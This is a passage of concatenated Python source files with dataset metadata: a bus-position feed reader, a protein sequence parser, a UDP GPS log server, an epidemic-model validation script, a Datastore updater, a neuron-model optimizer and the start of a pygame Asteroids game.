http://cvtd.info:8080/CVTDfeed/V200/XML/_System.php?key={} -s\".format(key))\n\ttree = ET.parse('cvtddata.txt')\n\troot = tree.getroot()\n\tfor bus in root:\n\t\tfor i in range(NUM_ELEMENTS - 1, 0, -1):\n\t\t\ttry:\n\t\t\t\trid = bus[2].text\n\t\t\t\tbnum = bus[3].text\n\t\t\t\trnum = bus[4].text\n\t\t\t\troute = bus[5].text\n\t\t\t\tt = datetime.strptime(bus[8][i].text.strip(), \"%Y-%m-%d %H:%M:%S.%f\")\n\t\t\t\tlat = float(bus[8][i][0].text)\n\t\t\t\tlon = float(bus[8][i][1].text)\n\t\t\t\tdirection = int(bus[8][i][2].text)\n\t\t\t\tif lat == 0.0 and lon == 0.0:\n\t\t\t\t\tcontinue\n\n\t\t\t\tentry = locator.find(rid, t)\n\t\t\t\tif entry is None:\n\t\t\t\t\tnewPos = CvtdBusPosition(t, lat, lon, direction)\n\t\t\t\t\tnewElements.add(rid)\n\t\t\t\t\tlocator.insert_append(rid, newPos)\n\t\t\texcept (IndexError, ValueError):\n\t\t\t\tcontinue\n\treturn newElements\n\n####\n# pull pulls data from the XML feed, updates the locator, and prints new positions to the screen\n#\n# myMap is the CvtdMap\n# locator is the CvtdBusLocator\n# count is the number of positions to print for each bus, 1-5\n# key is the text to insert into the URL\n####\ndef pull(myMap, locator, count, key):\n\tif not 1 <= count <= 5:\n\t\tprint(\"Error [pull]: Count must be between 1 and 5\")\n\t\treturn\n\n\tnewElements = pull_data(key, locator)\n\n\t# Generate print list so that formatting can be aligned\n\tprint_list = {}\n\tfor i in range(count):\n\t\tfor element in newElements:\n\t\t\tadd_to_print_list(myMap, locator, print_list, element, -1 - i)\n\n\t# Print everything in the print list\n\tprint_print_list(print_list, count)\n\n####\n# list_locator prints all positions stored in locator to the screen\n#\n# myMap is the CvtdMap\n# locator is the CvtdBusLocator\n# command is the command used, to be parsed for a route number. Else route number will be queried\n####\ndef list_locator(myMap, locator, command):\n\twords = command.split()\n\tif len(words) == 1:\n\t\tword = input(\"Enter route number to display: \")\n\t\twords.append(word)\n\tif len(words) >= 2:\n\t\tprint_list = {}\n\t\tfor word in words[1:]:\n\t\t\timport pdb; pdb.set_trace()\n\t\t\ttry:\n\t\t\t\tfor ix in range(len(locator.pos[word])):\n\t\t\t\t\troute = myMap.find_route_by_rnum(word)\n\t\t\t\t\tadd_to_print_list(myMap, locator, print_list, route.buses[0].id, ix)\n\t\t\texcept KeyError:\n\t\t\t\tprint(f\"Error: Unknown route: {word}\")\n\t\tprint_print_list(print_list, 1)\n \n####\n# get_filename parses a read or write command, and returns filename if given, else roads.txt\n#\n# command (should start with (r)ead or (w)rite), then filename if desired\n#\n# return[0] is the requested or default filename\n####\ndef get_filename(command):\n words = [a.strip() for a in command.strip().split()]\n if len(words) <= 1:\n return \"roads.txt\"\n else:\n return words[1]\n\n####\n# show_help prints a help message to the screen\n####\ndef show_help():\n\tprint(\"(1) Pull XML feed\")\n\tprint(\"(2) List locator positions\")\n\tprint(\"(3) Import Google directory\")\n\tprint(\"(r) Read roads file\")\n\tprint(\"(q) Quit\")\n\n####\n# main is the application entry point\n####\ndef main():\n\twith open('key.txt', 'r') as f:\n\t\tkey = f.read()\n\n\tmyMap = CvtdMap()\n\tlocator = CvtdBusLocator('locator/')\n\tlocator.read_locator()\n\tcommand = \"help\"\n\twhile command not in [\"quit\", \"exit\", \"q\", \"e\"]:\n\t\tif command == \"\":\n\t\t\tpass\n\t\telif command == \"1\":\n\t\t\tpull(myMap, locator, 1, key)\n\t\telif command[0] == \"2\":\n\t\t\tlist_locator(myMap, locator, command)\n\t\telif command == \"3\":\n\t\t\tmyMap.import_google_directory()\n\t\telif command.lower().strip().split()[0] in ['r', 'read', 'o', 'open']:\n\t\t\tmyMap.read_roads(get_filename(command))\n\t\telse:\n\t\t\tshow_help()\n\t\tcommand = input(\"\\n>>> \")\n\t\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"cvtdapp.py","file_name":"cvtdapp.py","file_ext":"py","file_size_in_byte":7594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"86384413","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 13 16:49:57 2019\n\n@author: HYEJEONG\n\"\"\"\nfrom collections import Counter\nfrom mathematics import *\n\n#aminoacid = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']\n#structure = ['h', 'e', '_']\n\n\n#symbollist = {'A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y'}\n#statelist = {'h', 'e', '_'}\n\ndef readfile(string):\n \"\"\"\n This is a method to determine if argument is a string representing a numeric value. \n \"\"\" \n for kind in (str, str, str): \n try: \n kind(string) \n except (TypeError, ValueError): \n pass \n else: \n return True \n else: \n return False \n\ndef lineseq(path): \n \"\"\"\n This method is for seperating string to word for getting symbols and states.\n \"\"\"\n allstring = [] \n with open(path) as f: \n for line in (line.strip() for line in f): ## line 말고 통째로 split \n fields = line.split() \n if fields: # non-blank line? \n if readfile(fields[0]):\n allstring += fields\n return allstring \n\ndef proteinseq(path, dbtype = 1):\n \"\"\"\n This is a method for getting a protein set. \n output = [ [ [ protein1 ], [ protein2 ], [ protein3 ], [ protein4 ], ... ],\n [ [ structure1 ], [ structure2 ], [ structure3 ], [ structure4 ], ... ] ]\n \"\"\" \n if dbtype == 0:\n None #FASTA file reading method will be here... To be continued... \n else:\n allstring = lineseq(path)\n protein = []\n secondstr = [] \n i = None\n for j in range(len(allstring)): \n if allstring[j] == '<>' or allstring[j] == '>':\n protein_single = []\n secondstr_single = []\n i = j+1\n while i < len(allstring):\n if allstring[i] == 'end' or allstring[i] == '<>' or allstring[i] == '' :\n protein.append(protein_single)\n secondstr.append(secondstr_single)\n protein_single = []\n secondstr_single = []\n break\n else: #allstring[i] != '<' or allstring[i] != '>' or allstring[i] != '<>':\n protein_single.extend(allstring[i])\n secondstr_single.extend(allstring[i+1])\n i += 2\n return protein, secondstr \n\ndef getproteinset(path):\n proteinset = proteinseq(path) \n return proteinset \n \n","sub_path":"final/linux/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"379850519","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n Author: Jorge A. Toro [jolthgs@gmail.com]\n\"\"\"\n\nimport sys \n#import os\nimport socket\nimport threading\nimport time\n\n\nFILE = '/tmp/gps.log'\n#FILE = 'gps.log'\nHOST = socket.gethostbyname(socket.gethostname())\nPORT = 59000\nSIZE = 256\n\n\ndef createFile(arch):\n \"\"\" \n Create file of Log \n \"\"\"\n with open(arch, 'w') as f:\n if f.tell() == 0: \n print >> f, 'ID'.center(8), 'IP,Port'.center(24), \\\n 'Date'.center(12), 'Time'.center(10), \\\n 'Event'.center(9), 'Latitude'.center(10), \\\n 'Longitude'.center(12), 'Geocoding'.center(36)\n print >> f, ('-'*6).ljust(8), ('-'*22).ljust(24), \\\n ('-'*10).ljust(14), ('-'*8).ljust(10), \\\n ('-'*6).ljust(6), ('-'*10).ljust(11), \\\n ('-'*10).ljust(12), ('-'*34).ljust(36) \n return True\n\n\nclass Device(threading.Thread):\n \"\"\" \n Dispositivos GPS \n \"\"\"\n\n endfile = 0\n\n def __init__(self, data, address, lock):\n threading.Thread.__init__(self)\n self.data, self.address = data, address\n self.lock = lock\n\n def run(self):\n \"\"\"\n run\n \"\"\"\n self.logFile()\n\n\n def logFile(self):\n \"\"\"\n Fichero de Log\n \"\"\"\n self.lock.acquire(True)\n with open(FILE, 'a+') as f:\n f.seek(self.__class__.endfile)\n #print >> f, f.tell()\n #print >> f, time.asctime() + ': ' + repr(self.address)\n print >> f, ('None').ljust(8), \\\n (repr(self.address)).ljust(26), \\\n (time.strftime('%D')).ljust(12), \\\n (time.strftime(\"%H:%M:%S\")).ljust(10), \\\n ('None').ljust(6), ('None').ljust(11), \\\n ('None').ljust(12), ('None').ljust(36) \n #print >> f, self.data\n self.__class__.endfile = f.tell() \n #f.close()\n self.lock.release()\n\n\n\nif __name__ == \"__main__\":\n #if os.path.exists(FILE) or createFile(FILE):\n if createFile(FILE):\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind((HOST, PORT))\n\n lock = threading.Lock()\n\n print(\"Servidor %s:%s\" % (HOST, PORT)) \n\n while 1:\n try:\n data, address = sock.recvfrom(SIZE)\n device = Device(data, address, lock)\n device.start()\n\n except KeyboardInterrupt: \n sys.stderr.write(\"Exit, KeyboardInterrupt\\n\")\n try:\n sock.close()\n device.join() # Esperamos hasta que termine la ejecución del hilo\n # para terminar la ejecución del programa.\n except NameError: pass\n\n break # salimos del bucle principal\n\n #else:\n #device.join() \n #sock.close()\n #break\n \n","sub_path":"BK/gpservid-0.0.3.py","file_name":"gpservid-0.0.3.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"613183455","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nWhen you use this file from the top directory of the repository with poetry, please run\ncd example; poetry run ./model_validation.py; cd ../\n\"\"\"\n\nimport os\nimport sys\ntry:\n sys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nexcept Exception:\n pass\nfrom pathlib import Path\nimport covsirphy as cs\n\n\ndef main():\n # This script works with version >= 2.18.0-alpha\n print(cs.get_version())\n # Create output directory in example directory\n code_path = Path(__file__)\n output_dir = code_path.with_name(\"output\").joinpath(code_path.stem)\n output_dir.mkdir(exist_ok=True, parents=True)\n filer = cs.Filer(output_dir, numbering=\"01\")\n # Setting\n models = [cs.SIR, cs.SIRD, cs.SIRF]\n step_numbers = list(range(3, 10))\n # Execute validation\n for step_n in step_numbers:\n validator = cs.ModelValidator(tau=1440, n_trials=8, step_n=step_n, seed=2)\n for model in models:\n validator.run(model)\n validator.summary().to_csv(**filer.csv(f\"summary_{step_n}-points\", index=False))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"example/model_validation.py","file_name":"model_validation.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"611628243","text":"# coding: utf-8\nif __name__=='__main__':\n from google.cloud import datastore\n import json\n import os\n\n credentials_json = './key.json' # BigQuery設定時の鍵へのパス\n os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = credentials_json\n project_id = \"****\"\n\n # クライアントの設定\n client = datastore.Client(project=project_id, namespace=\"Diary\")\n\n with open(\"input.csv\") as f:\n for line in f:\n info = line[:-1].split(',')\n print(info)\n # kindにエンティティ種類名を指定\n key = client.key(\"day_info\", int(info[1]))\n entity = client.get(key)\n entity[info[2]] = str(info[3])\n print(entity)\n client.put(entity)\n\n","sub_path":"diary-js/src/transfer/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"86991163","text":"import numpy as np\n\nfrom bluepyopt.deapext.optimisations import IBEADEAPOptimisation\nfrom bluepyopt.ephys.objectives import WeightedSumObjective, SingletonObjective\nfrom bluepyopt.parameters import Parameter\nfrom bluepyopt.evaluators import Evaluator\n\nfrom neat import NeuronSimTree\n\nimport pickle\n\nfrom channels import channelcollection\nimport utils, data\n\n\n## optimization ################################################################\n# trial run parameter values\nMAX_ITER = 10\nN_OFFSPRING = 2\n# full optimization parameter values\n# MAX_ITER = 100\n# N_OFFSPRING = 100\n################################################################################\n\n\n## model evaluator for optimization ############################################\nclass ModelEvaluator(Evaluator):\n def __init__(self, sim_tree, v_dat,\n loc_soma, loc_dend,\n channel_names=['L'],\n mode='fit'):\n \"\"\"\n if mode is fit, check bounds, if mode is evaluate, dont check bounds\n \"\"\"\n self.sim_tree = sim_tree\n self.channel_names = channel_names\n # injection sites\n self.loc_soma, self.loc_dend = loc_soma, loc_dend\n # params\n self.dt, self.dur, self.t_max = data.DT, data.DUR, data.T_MAX\n self.t0, self.t1, self.t2, self.t3 = data.T0, data.T1, data.T2, data.T3\n self.a0, self.a1, self.a2, self.a3 = data.A0, data.A1, data.A2, data.A3\n self.channel_names = channel_names\n\n # constant params\n self.r_a = 113./1e6\n self.g_max = {'L': 20.*1e2, 'L_c': 20.*1e2,\n 'K_ir': 40.*1e2, 'K_m': 40.*1e2, 'K_m35': 40.*1e2,\n 'h_u': 60.*1e2, 'h_HAY': 60.*1e2,\n 'Na_p': 100.*1e2, 'NaP': 100.*1e2}\n # define fit parameters\n self._defineFitObjects(v_dat)\n\n # don't check bounds\n if mode == 'evaluate':\n for p in self.params:\n p.bounds = None\n\n def _defineFitObjects(self, v_dat):\n # fitness evaluator\n features = [utils.VeqFeature(v_dat), utils.VStepFeature(v_dat), utils.TraceFeature(v_dat)]\n self.objectives = [SingletonObjective('V_eq', features[0]),\n SingletonObjective('V_step', features[1]),\n SingletonObjective('V_trace', features[2])]\n # parameters\n self.params = [Parameter('d_c_m', value=0.001, bounds=[0., 0.01]),\n Parameter('c_m_0', value=1., bounds=[0.50, 1.50])]\n for c_name in self.channel_names:\n if c_name == 'K_m' or c_name == 'K_m35' or c_name == 'K_ir':\n params = [Parameter('d_'+c_name, value=-1./200., bounds=[-0.1, 0.]),\n Parameter('g0_'+c_name, value=40.*1e2, bounds=[0., 10000.]),\n Parameter('e_r_'+c_name, value=-85., bounds=[-95.,-80.])]\n elif c_name == 'h_HAY' or c_name == 'h_u':\n params = [Parameter('d_'+c_name, value=1./200., bounds=[0.0, 0.1]),\n Parameter('g0_'+c_name, value=0.0099*1e2, bounds=[0., 10000.]),\n Parameter('e_r_'+c_name, value=-40., bounds=[-50.,-30.])]\n elif c_name == 'Na_p' or c_name == 'NaP':\n params = [Parameter('d_'+c_name, value=0., bounds=[-0.0001, 0.0001]),\n Parameter('g0_'+c_name, value=0.01*1e2, bounds=[0.,10000.]),\n Parameter('e_r_'+c_name, value=50., bounds=[40.,60.])]\n # elif c_name == 'L':\n # params = [Parameter('d_L', value=1./200., bounds=[0.0, 0.05]),\n # Parameter('g0_L', value=0.40*1e2, bounds=[0., 300.]),\n # Parameter('e_0_L', value=-90., bounds=[-100., -50.]),\n # Parameter('e_c_L', value=0., bounds=[-1./15, 1./15])]\n elif c_name == 'L':\n params = [Parameter('d_L', value=1./1000., bounds=[0.0, 0.05]),\n Parameter('g0_L', value=0.40*1e2, bounds=[0., 300.]),\n Parameter('e_0_L', value=-90., bounds=[-100., -50.])]\n elif c_name == 'L_c':\n params = [Parameter('d_L_c', value=1./1000., bounds=[0.0, 0.05]),\n Parameter('g0_L_c', value=0.40*1e2, bounds=[0., 300.]),\n Parameter('e_0_L_c', value=-90., bounds=[-100., -50.]),\n Parameter('e_c_L_c', value=0., bounds=[-1./15, 1./15])]\n\n # # original params\n # self.params = [Parameter('d_c_m', value=0.001, bounds=[0., 0.01]),\n # Parameter('c_m_0', value=1., bounds=[0.95, 1.05])]\n # for c_name in self.channel_names:\n # if c_name == 'K_m' or c_name == 'K_m35' or c_name == 'K_ir':\n # params = [Parameter('d_'+c_name, value=-1./100., bounds=[-0.1, 0.]),\n # Parameter('g0_'+c_name, value=40.*1e2, bounds=[0., 10000.]),\n # Parameter('e_r_'+c_name, value=-85., bounds=[-95.,-80.])]\n # elif c_name == 'h_HAY' or c_name == 'h_u':\n # params = [Parameter('d_'+c_name, value=1./100., bounds=[0.0, 0.1]),\n # Parameter('g0_'+c_name, value=0.0099*1e2, bounds=[0., 10000.]),\n # Parameter('e_r_'+c_name, value=-40., bounds=[-50.,-30.])]\n # elif c_name == 'Na_p' or c_name == 'NaP':\n # params = [Parameter('d_'+c_name, value=0., bounds=[-0.0001, 0.0001]),\n # Parameter('g0_'+c_name, value=0.01*1e2, bounds=[0.,10000.]),\n # Parameter('e_r_'+c_name, value=50., bounds=[40.,60.])]\n # # elif c_name == 'L':\n # # params = [Parameter('d_L', value=1./200., bounds=[0.0, 0.05]),\n # # Parameter('g0_L', value=0.40*1e2, bounds=[0., 300.]),\n # # Parameter('e_0_L', value=-90., bounds=[-100., -50.]),\n # # Parameter('e_c_L', value=0., bounds=[-1./15, 1./15])]\n # elif c_name == 'L':\n # params = [Parameter('d_L', value=1./200., bounds=[0.0, 0.05]),\n # Parameter('g0_L', value=0.40*1e2, bounds=[0., 300.]),\n # Parameter('e_0_L', value=-90., bounds=[-100., -50.])]\n # elif c_name == 'L_c':\n # params = [Parameter('d_L_c', value=1./200., bounds=[0.0, 0.05]),\n # Parameter('g0_L_c', value=0.40*1e2, bounds=[0., 300.]),\n # Parameter('e_0_L_c', value=-90., bounds=[-100., -50.]),\n # Parameter('e_c_L_c', value=0., bounds=[-1./15, 1./15])]\n\n\n else:\n warnings.warn('unrecognized ion channel \\'' + c_name +'\\'( choose from ' + \\\n ' '.join(['L', 'K_m', 'K_m35', 'K_ir', 'h_HAY', 'h_u']), + \\\n '), ignoring current channel.')\n self.params.extend(params)\n\n def evalFitness(self, responses):\n return [obj.calculate_score(responses) for obj in self.objectives]\n\n def getParameterValues(self):\n return [p.value for p in self.params]\n\n def setParameterValues(self, values):\n if values is None:\n values = self.getParameterValues()\n if isinstance(values, list):\n for p, v in zip(self.params, values): p.value = v\n elif isinstance(values, dict):\n for p in self.params: p.value = values[p.name]\n else:\n raise TypeError('``values`` must be `list` or `dict`')\n\n def getParameterValuesAsDict(self):\n return {p.name: p.value for p in self.params}\n\n def toStrParameterValues(self, values=None):\n rstr = 'Parametervalues =\\n'\n if values is None:\n values = [p.value for p in self.params]\n if isinstance(values, list):\n for p, v in zip(self.params, values):\n rstr += ' > ' + p.name + ' = %.5f\\n'%v\n elif isinstance(values, dict):\n for p in self.params:\n rstr += ' > ' + p.name + ' = %.5f\\n'%values[p.name]\n return rstr\n\n def toStrFitness(self, responses):\n fitness = self.evalFitness(responses)\n rstr = 'Fitness =\\n'\n for ii, ff in enumerate(fitness):\n rstr += ' > f_%d = %.5f\\n'%(ii,ff)\n return rstr\n\n def getTreeWithParams(self, new_tree=None):\n ps = self.getParameterValuesAsDict()\n # set the physiology parameters of this tree\n sim_tree = self.sim_tree.__copy__(new_tree=new_tree)\n sim_tree.treetype = 'original'\n # capacitance\n c_m_distr = utils.linDistr(ps['c_m_0'], ps['d_c_m'])\n sim_tree.setPhysiology(c_m_distr, self.r_a)\n # membrane current parameters\n for ii, c_name in enumerate(self.channel_names):\n g_func = utils.expDistr(ps['d_'+c_name], ps['g0_'+c_name], g_max=self.g_max[c_name])\n if c_name != 'L' and c_name != 'L_c':\n e_r = ps['e_r_'+c_name]\n # add the current\n chan = eval('channelcollection.' + c_name + '()')\n sim_tree.addCurrent(chan, g_func, e_r)\n else:\n if c_name == 'L_c':\n e_func = utils.linDistr(ps['e_0_L_c'], ps['e_c_L_c'])\n else:\n e_func = lambda x: ps['e_0_L']\n # add the current\n for node in sim_tree:\n d2s = sim_tree.pathLength({'node': node.index, 'x': .5}, (1., 0.5))\n g_l = g_func(d2s)\n e_l = e_func(d2s)\n node._addCurrent('L', g_l, e_l)\n\n return sim_tree\n\n def runSim(self):\n '''\n Format for args:\n [c_m, r_a] +\n [d_scale, g_0, g_max] for expDistr for each conductance channel in self.channel_names +\n [e_0, e_1] for the leak potential\n '''\n sim_tree = self.getTreeWithParams()\n # initialize the simulation\n sim_tree.setCompTree()\n sim_tree.treetype = 'computational'\n sim_tree.initModel(dt=self.dt, t_calibrate=200.)\n # add Iclamps\n sim_tree.addIClamp(self.loc_dend, self.a0, self.t0, self.dur)\n sim_tree.addIClamp(self.loc_dend, self.a1, self.t1, self.dur)\n sim_tree.addIClamp(self.loc_soma, self.a2, self.t2, self.dur)\n sim_tree.addIClamp(self.loc_soma, self.a3, self.t3, self.dur)\n # set recorders\n sim_tree.storeLocs([self.loc_soma, self.loc_dend], name='rec locs')\n\n # run simulation\n res = sim_tree.run(self.t_max, pprint=False)\n\n sim_tree.deleteModel()\n\n return res\n\n def evaluate_with_lists(self, param_values=None):\n return self.evaluate(param_values)\n\n def evaluate(self, param_values, pprint=True):\n self.setParameterValues(values=param_values)\n res = self.runSim()\n fitness = self.evalFitness(res['v_m'][:,:-1])\n if pprint:\n print('>>> fitness =', fitness)\n # print '>>> ' + self.toStrParameterValues()\n return fitness\n\n\nclass AttenuationEvaluator(ModelEvaluator):\n def __init__(self, sim_tree, f_d2s, f_s2d,\n loc_soma, loc_dend, mode='fit'):\n \"\"\"\n Only optimizes h-current\n\n if mode is fit, check bounds, if mode is evaluate, dont check bounds\n \"\"\"\n self.sim_tree = sim_tree\n # injection sites\n self.loc_soma, self.loc_dend = loc_soma, loc_dend\n # params\n self.dt, self.dur, self.t_max = data.DT, data.DUR, data.T_MAX\n self.t0, self.t1, self.t2, self.t3 = data.T0, data.T1, data.T2, data.T3\n self.a0, self.a1, self.a2, self.a3 = data.A0, data.A1, data.A2, data.A3\n\n self.mode = mode\n\n # define fit parameters\n self._defineFitObjects(f_d2s, f_s2d)\n\n # don't check bounds\n if mode == 'evaluate':\n for p in self.params:\n p.bounds = None\n\n def _defineFitObjects(self, f_d2s, f_s2d):\n # reference attenuation\n v_dat = data.DataContainer(with_zd=True)\n att_f = utils.AttFeature(v_dat)\n att_ref_d2s = att_f.att_d2s * f_d2s\n att_ref_s2d = att_f.att_s2d * f_d2s\n # fitness evaluator\n features = [utils.AttFeature_(att_ref_d2s, att_ref_s2d, v_dat)]\n self.objectives = [SingletonObjective('Att', features[0])]\n # parameters\n self.params = [\n Parameter('g_h_0', value=0., bounds=[0.,50000.]),\n Parameter('g_h_1', value=200., bounds=[0.,50000.]),\n Parameter('g_h_2', value=2000., bounds=[0.,50000.]),\n Parameter('g_h_3', value=5000., bounds=[0.,50000.]),\n Parameter('e_r_h', value=-40., bounds=[-50.,-30.]),\n Parameter('g_h_b', value=0., bounds=[0.,50000.]),\n ]\n\n def _h_distr_func(self, x, ds=[0., 250., 500., 750.]):\n ps = self.getParameterValues()\n\n if x <= ds[1]:\n d0 = ds[0]; d1 = ds[1]\n p0 = ps[0]; p1 = ps[1]\n elif x > ds[1] and x < ds[2]:\n d0 = ds[1]; d1 = ds[2]\n p0 = ps[1]; p1 = ps[2]\n else:\n d0 = ds[2]; d1 = ds[3]\n p0 = ps[2]; p1 = ps[3]\n\n return p0 + (p1 - p0) / (d1 - d0) * (x - d0)\n\n def getTreeWithParams(self, new_tree=None):\n ps = self.getParameterValuesAsDict()\n # set the physiology parameters of this tree\n sim_tree = self.sim_tree.__copy__(new_tree=new_tree)\n sim_tree.treetype = 'original'\n # h-current distribution\n h_u = channelcollection.h_u()\n sim_tree.addCurrent(h_u, self._h_distr_func, ps['e_r_h'], node_arg='apical')\n\n sim_tree.addCurrent(h_u, ps['g_h_b'], ps['e_r_h'], node_arg='basal')\n sim_tree.addCurrent(h_u, ps['g_h_b'], ps['e_r_h'], node_arg=[sim_tree[1]])\n\n return sim_tree\n################################################################################\n\n\ndef optimize(evaluator):\n global MAX_ITER, N_OFFSPRING\n\n optimisation = IBEADEAPOptimisation(evaluator=evaluator,\n offspring_size=N_OFFSPRING, map_function=map)\n final_pop, hall_of_fame, logs, hist = optimisation.run(max_ngen=MAX_ITER)\n\n return final_pop, hall_of_fame, logs, hist\n\n\ndef optimizeModel(channel_names=None, zd=False, suffix=''):\n \"\"\"\n Optimizes the morphology equipped with channels in `channel_names` to\n recordings with or without ZD\n\n Parameters\n ----------\n channel_names: list of str\n Choose channel names from from {'L', 'K_m', 'K_m35', 'K_ir', 'h_HAY', 'h_u'}\n zd: bool\n True for data with ZD, false for data without ZD\n \"\"\"\n global MAX_ITER, N_OFFSPRING\n\n if channel_names is None:\n channel_names = ['L', 'K_ir', 'K_m35', 'h_u']\n file_name = utils.getFileName(channel_names, zd, suffix=suffix)\n\n full_tree, red_tree, full_locs, red_locs = data.reduceMorphology()\n sim_tree = red_tree.__copy__(new_tree=NeuronSimTree())\n\n # measured data\n v_dat = data.DataContainer(with_zd=zd)\n model_evaluator = ModelEvaluator(sim_tree, v_dat, red_locs[0], red_locs[1],\n channel_names=channel_names)\n\n final_pop, hall_of_fame, logs, hist = optimize(model_evaluator)\n\n # save hall of fame\n file = open(file_name, 'wb')\n pickle.dump(hall_of_fame, file)\n file.close()\n\n\nif __name__ == \"__main__\":\n optimizeModel(channel_names=['L'], zd=False, suffix='_test')","sub_path":"optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":15638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"145304203","text":"import pygame\nfrom math import cos,sin,sqrt,radians,atan,pi\nimport random\npygame.init()\n\nclass GUI():\n WHITE = (255,255,255)\n font = pygame.font.SysFont(\"couriernew\",32)\n bx = 700\n by = 100\n\n def __init__(self,gD):\n self.gD = gD\n\n def update(self,ship):\n box = pygame.surface.Surface((self.bx, self.by))\n txt_surf = self.font.render(str(ship.score), True, self.WHITE) # bottom line\n txt_rect = txt_surf.get_rect(center=(75, 40))\n box.blit(txt_surf, txt_rect)\n w,h = ship.oImage.get_size()\n txt_surf = pygame.transform.scale(ship.oImage,(int(w*.5),int(h*.5)))\n for x in range(ship.lives):\n spacing = x*45\n txt_rect = txt_surf.get_rect(center=(75-45+spacing, 90))\n box.blit(txt_surf, txt_rect)\n self.gD.blit(box,(0,0))\n\n def gameOver(self,ship):\n box = pygame.surface.Surface((300,500))\n gO = self.font.render(\"GAME OVER\", True,self.WHITE)\n gO_rect = gO.get_rect(center=(90,90))\n box.blit(gO,gO_rect)\n txt_surf = self.font.render(str(ship.score), True, self.WHITE) # bottom line\n txt_rect = txt_surf.get_rect(center=(90, 200))\n box.blit(txt_surf,txt_rect)\n w,h = self.gD.get_size()\n self.gD.blit(box,(int(w/2)-90,int(h/2)-90-40))\n\n\ndef rot_center(image, angle):\n \"\"\"rotate a Surface, maintaining position.\"\"\"\n #DOES NOT WORK\n\n loc = image.get_rect().center #rot_image is not defined\n rot_sprite = pygame.transform.rotate(image, angle)\n # rot_sprite.get_rect().center = loc\n rotRect = rot_sprite.get_rect()\n rotRect.center = loc\n return rot_sprite,rotRect\n\nclass Ship():\n \"\"\"Ship class!\n Holds data on ship:\n angle (degress)\n x_speed\n y_speed\n x (position)\n y (position)\n oImage (img) original\n nImage (img) new\n drift (boolean)\n rect (pygame surface)\n\n \"\"\"\n x_speed = 0\n y_speed = 0\n drift = False\n def __init__(self,x,y,angle,img,gD):\n \"\"\"\n Initliazes with where the ship is facing as the angle\n \"\"\"\n self.startingAngle = angle\n self.angle = angle\n self.startingX = x\n self.startingY = y\n self.x = x\n self.y = y\n self.oImage = img\n self.nImage = img\n self.w,self.h = img.get_size()\n self.gD = gD\n self.rect = img.get_rect()\n self.changex = self.rect.w / 2\n self.changey = self.rect.h / 2\n self.rect.inflate_ip(-self.changex,-self.changey)\n self.rect.center = (self.x,self.y)\n self.score = 0\n self.lives = 3\n self.destroyed = False\n self.extraLives = 1\n def move(self):\n \"\"\"FORWARD!!!\n Moves the ship forward in the direction it's heading (its angle)\n \"\"\"\n self.drift = False\n self.x_speed += cos(radians(self.angle))*.4\n self.y_speed += sin(radians(self.angle))*.4\n # if sqrt(self.x_speed**2+self.y_speed**2) < 10:\n\n def rotate(self,posNeg):\n \"\"\"Rotates ship\"\"\"\n self.nImage,self.rect = rot_center(self.oImage,posNeg*3+(270-self.angle))\n self.changex = self.rect.w / 2\n self.changey = self.rect.h / 2\n self.rect.inflate_ip(-self.changex,-self.changey)\n self.rect.center = (self.x,self.y)\n self.angle -= posNeg*3\n\n def update(self):\n \"\"\"MAGIC\n Does magic and makes the ship work.\n Updates position\n \"\"\"\n if(self.score > 10000 * self.extraLives):\n self.lives += 1\n self.extraLives += 1\n if(self.destroyed):\n self.counter += 1\n if(self.counter == 120):\n self.destroyed = False\n width,height = self.gD.get_size()\n speed = sqrt(self.x_speed**2+self.y_speed**2)\n # print(speed)\n if speed < .08 and self.drift:\n self.drift = False\n self.x_speed = 0\n self.y_speed = 0\n if speed > 10:\n self.x_speed = cos(radians(self.angle))*10\n self.y_speed = sin(radians(self.angle))*10\n if self.drift:\n #theta = atan(self.y_speed/self.x_speed)\n self.x_speed *= .98\n self.y_speed *= .98\n\n self.y += self.y_speed\n self.x += self.x_speed\n\n if(self.x >= width):\n self.x = 0 - self.w\n elif(self.x <= 0 - self.w):\n self.x = width\n if(self.y >= height):\n self.y = 0 - self.h\n elif(self.y <= 0 - self.h):\n self.y = height\n self.rect.center = (self.x,self.y)\n #self.nImage.center = (self.x,self.y)\n #pygame.draw.rect(self.gD,(255,0,255),self.rect) # display's the ship's hit box in purple (for testing\n self.gD.blit(self.nImage,(self.rect.x - self.changex / 2, self.rect.y - self.changey / 2))\n #pygame.draw.rect(self.gD,(255,0,255),self.rect) # display's the ship's hit box in purple (for testing)\n def shoot(self,AllThings):\n x = self.x + int(5 * cos(self.angle))\n y = self.y + int(5 * sin(self.angle))\n AllThings.Projectiles.addProjectile(x,y,radians(self.angle),\"Ship\")\n def destroy(self):\n self.destroyed = True\n self.lives = self.lives - 1 # right now just a test, need to put something else here\n self.x = self.startingX\n self.y = self.startingY\n self.angle = self.startingAngle\n self.rotate(0)\n self.x_speed = 0\n self.y_speed = 0\n self.counter = 0\nclass Asteroid():\n \"\"\"\n Asteroid Class:\n x - position\n y - position\n speed - speed of asteroid\n 